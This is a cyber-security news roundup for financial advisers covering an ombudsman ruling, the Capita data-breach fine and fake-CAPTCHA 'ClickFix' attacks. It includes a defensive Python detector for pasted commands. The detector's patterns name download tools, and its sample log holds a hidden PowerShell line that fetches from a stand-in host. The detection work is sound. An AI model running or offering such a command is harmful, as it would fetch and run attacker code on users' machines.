IFA told to compensate client over cyber breach
The Financial Ombudsman Service (FOS) ruled that an independent financial adviser (IFA) must compensate a client after a breach involving a third-party ISA platform. Attackers had gained access to the client’s ISA, added a new bank account and attempted to withdraw nearly £10,000. Although no funds were ultimately lost, the breach of personal and financial data led the client to hold the IFA accountable for how the third-party platform was managed and monitored.
Key take-away:
Cyber-criminals are increasingly targeting third-party providers to gain access to their network of customers. It’s essential to carry out due diligence on your key platform providers and suppliers before onboarding and continue to monitor them annually.
At a minimum, you should expect third-party providers to meet recognised information security standards (Cyber Essentials, ISO 27001, etc.) and to have layered security controls covering people, processes and technology in place to counter constantly evolving threats. Engaging industry experts to conduct independent system testing and rehearsing incident response plans are also good practice.
If you’re unsure where to start when it comes to cyber security, the National Cyber Security Centre (NCSC) launched the Cyber Action Toolkit to help small organisations implement essential security measures. It also encourages the adoption of Cyber Essentials, which provides protection guidance and includes automatic cyber insurance for UK firms with under £20m turnover.
Capita fined £14m over data breach that saw customers’ information leaked
Capita was fined £14 million after a cyber-attack exposed the personal and financial details of 6.65 million people. The breach began on 22 March 2023, when an employee accidentally downloaded a malicious file. Although Capita detected the threat within 10 minutes, the infected device wasn’t quarantined for 58 hours—giving the attacker time to move through the network, gain admin access, and steal nearly a terabyte of data. By 31 March, ransomware had been deployed, passwords were reset, and staff were locked out of systems, prompting at least 93 complaints.
In its penalty notice, the Information Commissioner’s Office (ICO) states that Capita failed to maintain adequate security measures to protect the data it held. It compared Capita’s shortcomings against several key frameworks and best-practice standards, and in particular against the UK General Data Protection Regulation (GDPR) obligation to implement and use appropriate technical and organisational security measures to prevent cyber-attacks.
Key take-away:
ICO penalty notices give great insight into how cyber-attacks take place, and specifically into what went wrong.
In this case, the Capita breach offers several important lessons:
- Act fast on alerts – Capita detected the threat early but waited 58 hours to isolate it, giving attackers time to spread and steal data.
- Have a clear incident response plan – everyone should know exactly what to do when an alert hits.
- Segregate admin and standard accounts – prevent attackers who compromise lower-tier accounts from gaining access to higher-tier systems.
- Train staff – the breach began with a malicious file download. Awareness remains your first line of defence.
- Check supplier security – if third parties handle client data, ensure they meet strong security standards.
After a breach, the regulator will compare your security implementation against well-known security frameworks. It’s imperative that you understand and implement them so that you can demonstrate compliance and avoid large fines should the worst happen.
Global threat intelligence report highlights 500% surge in human-targeted ClickFix cyber attacks
The “I’m not a robot” tick boxes that pop up on websites are meant to keep out bots and prevent automated attacks. But sadly, cybercriminals are now turning this trusted feature into one of the fastest-growing attacks of 2025.
This fake CAPTCHA attack, often referred to as ‘ClickFix’, has surged by more than 500% this year. Here’s how these increasingly clever scams usually work:
- You visit a site, and a “CAPTCHA” prompt appears, looking just like the real thing.
- Instead of simply letting you through, it shows an error message with instructions - often asking you to complete ‘verification steps’ by copying, pasting, or running something on your device.
- If you carry out its request, you could end up handing over your passwords, sensitive data, and access to your accounts without realising what’s happened.
Key take-away:
Attackers know they need to constantly evolve their phishing and social engineering attacks to be successful — and ClickFix attacks are just one of the latest cyber scams going around. Ensure you, and your staff, keep on top of new threats and how cyber criminals are evolving their tactics. You can then adapt your defences to make yourself and your business more resilient to future online threats.
With a little awareness, you can spot the signs early and avoid being caught out. A real CAPTCHA will never ask you to:
- Copy, paste, or run any code
- Download a file to your device
- Enter your credentials outside the normal login box
- Press shortcuts like Windows+R, CTRL+V, or anything similar
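The user-facing signs above have a counterpart on the endpoint: a pasted “verification step” ends up as a script interpreter launched from the Run dialog with a command line a normal user would never type. The following is an added defender-side example, not code from the original article or any vendor; it scores constructed process-creation events for those traits. It assumes a simple pipe-separated event format and that the sensor records explorer.exe as the parent of Run-dialog launches, both of which you should confirm against your own EDR.

```python
import re
from dataclasses import dataclass
from typing import List

# Interpreters a pasted "verification step" would typically be run through.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# Command-line traits rarely typed by hand into the Run dialog.
SUSPICIOUS = [
    re.compile(r"https?://", re.I),                    # fetches something remote
    re.compile(r"-(w|windowstyle)\s+hidden", re.I),    # hides its own window
    re.compile(r"-(e|enc|encodedcommand)\s", re.I),    # obfuscated payload
    re.compile(r"\b(iwr|invoke-webrequest|curl|certutil)\b", re.I),
]

@dataclass
class ProcEvent:
    ts: str
    parent: str
    image: str
    cmdline: str

def parse_event(line: str) -> ProcEvent:
    """Parse one 'ts | parent | image | cmdline' line (constructed format)."""
    ts, parent, image, cmdline = (f.strip() for f in line.split("|", 3))
    return ProcEvent(ts, parent, image, cmdline)

def score_event(ev: ProcEvent) -> int:
    """Return a ClickFix-likeness score; 0 means not an interpreter launch."""
    if ev.image.lower() not in INTERPRETERS:
        return 0
    score = 0
    # Assumption: Win+R launches show explorer.exe as the parent process.
    if ev.parent.lower() == "explorer.exe":
        score += 1
    score += sum(1 for pat in SUSPICIOUS if pat.search(ev.cmdline))
    return score

def flag_clickfix(lines: List[str], threshold: int = 2) -> List[ProcEvent]:
    """Return events whose score reaches the threshold (tune per environment)."""
    return [ev for ev in map(parse_event, lines) if score_event(ev) >= threshold]

# Constructed sample telemetry, not real logs. Line 2 mimics a pasted command;
# line 3 is an admin working in a terminal; line 4 is a user opening PowerShell.
SAMPLE_LOG = [
    "2025-06-01T09:14:02 | explorer.exe | notepad.exe | notepad.exe notes.txt",
    "2025-06-01T09:15:40 | explorer.exe | powershell.exe | powershell.exe -w hidden -c \"iwr https://example.invalid/verify\"",
    "2025-06-01T10:02:11 | WindowsTerminal.exe | powershell.exe | powershell.exe Get-Service",
    "2025-06-01T10:30:00 | explorer.exe | powershell.exe | powershell.exe",
]

if __name__ == "__main__":
    for hit in flag_clickfix(SAMPLE_LOG):
        print(f"{hit.ts} score={score_event(hit)} parent={hit.parent} cmd={hit.cmdline}")
```

Only the pasted-command line is flagged; the terminal session and the plain PowerShell launch score too low, which is the false-positive control the threshold provides.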
This article is for financial professionals only. Any information contained within is of a general nature and should not be construed as a form of personal recommendation or financial advice. Nor is the information to be considered an offer or solicitation to deal in any financial instrument or to engage in any investment service or activity.
Parmenion accepts no duty of care or liability for loss arising from any person acting, or refraining from acting, as a result of any information contained within this article. All investment carries risk. The value of investments, and the income from them, can go down as well as up and investors may get back less than they put in. Past performance is not a reliable indicator of future returns.